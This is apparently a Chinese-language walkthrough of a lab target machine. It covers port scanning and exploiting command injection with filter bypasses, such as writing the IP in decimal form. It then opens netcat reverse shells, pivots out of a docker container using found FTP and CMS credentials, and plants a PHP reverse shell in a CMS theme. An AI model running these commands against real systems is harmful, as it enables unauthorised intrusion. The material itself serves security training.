环境准备

靶机链接：百度网盘 请输入提取码

提取码：d3du

虚拟机网络链接模式：NET模式

攻击机系统：kali linux 2022.03

信息收集

探测目标靶机开放端口和服务情况。

nmap -p- -A -sV 192.168.255.132

nmap --script=vuln -p 80 192.168.255.132 扫描常见漏洞

nmap 192.168.255.132 -sU UDP端口扫描

漏洞利用

1.访问网页发现一个上传点，上传木马文件；

上传失败后，提示只允许上传的文件类型。

2.发现命令执行漏洞，执行whoami；成功执行，是root权限。

3.直接本地开启监听，用nc反弹shell

nc -e /bin/sh 192.168.255.131 4444

4.没有反弹成功，尝试查看靶机是否安装了nc

5.报错500 可能对whereis进行了过滤，已知nc:目录在/usr/bin/nc下，用ls命令查看

6.依然报500，那么网站对/过滤

7.ls执行后，发现一个main.py的文件

8.查看下，发现依然报错；

cat main.py

9.可能对后缀名为py文件过滤，用 ”* “

cat main.*

10.成功查看到main文件，说明对"."过滤

cat main*

11.对"."和"/"过滤，那么反弹shell命令的ip改成长类型的十进制

3232300931

12.本地开启监听，反弹成功。

nc 3232300931 4444 -e bash

13.反弹交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

docker容器

1.查看message.txt提示还没有做完！这是一个docker容器的root。

cd /app

2.在main.py里查看到ftp的域名和用户名和密码。

ftp.mofo.pwn

someuser b232a4da4c104798be4613ab76d26efda1a04606

3.ifconfig查看ip ,ping ftp的域名，得到真实ip

4.ftp登录下，发下没有，有一个lftp

5.登录成功后得到一个cms的用户名和密码信息

Admin-password for our new CMS

hardEnough4u

6.使用nmap命令后，报没有找到，apt命令安装又不行。在.ncftp下找到linux的版本

7.谷歌后知道用apk命令安装nmap

8.apk add nmap

nmap -sn 172.16.0.0/24 对目标进行ping检测 禁用端口扫描

获得内网存活主机为：

172.19.0.1

172.19.0.12 ftp

172.19.0.100 dns

172.19.0.10 本机

猜测172.19.0.1为主机ip

添加路由 ip route add 172.19.0.0/24 via 192.168.255.131

9.nmap后看到开放的22、80、8080端口

10.访问后跟之前的一样

11.将域名添加到/etc/hosts下

12.访问8080端口，找到之前说的cms。

13.扫描目录，得到admin目录

dirsearch -u http://ourcms.mofo.pwn:8080 --exclude-status 400,401,403,404,405,501,503

14.用用户名密码登录。

15.修改主题

16.把内容改为php-reverse-shell.php的内容 保存。

http://ourcms.mofo.pwn:8080/theme/Innovation/template.php

权限提升

1.开启监听后，访问网址，成功反弹shell

2.提权没成功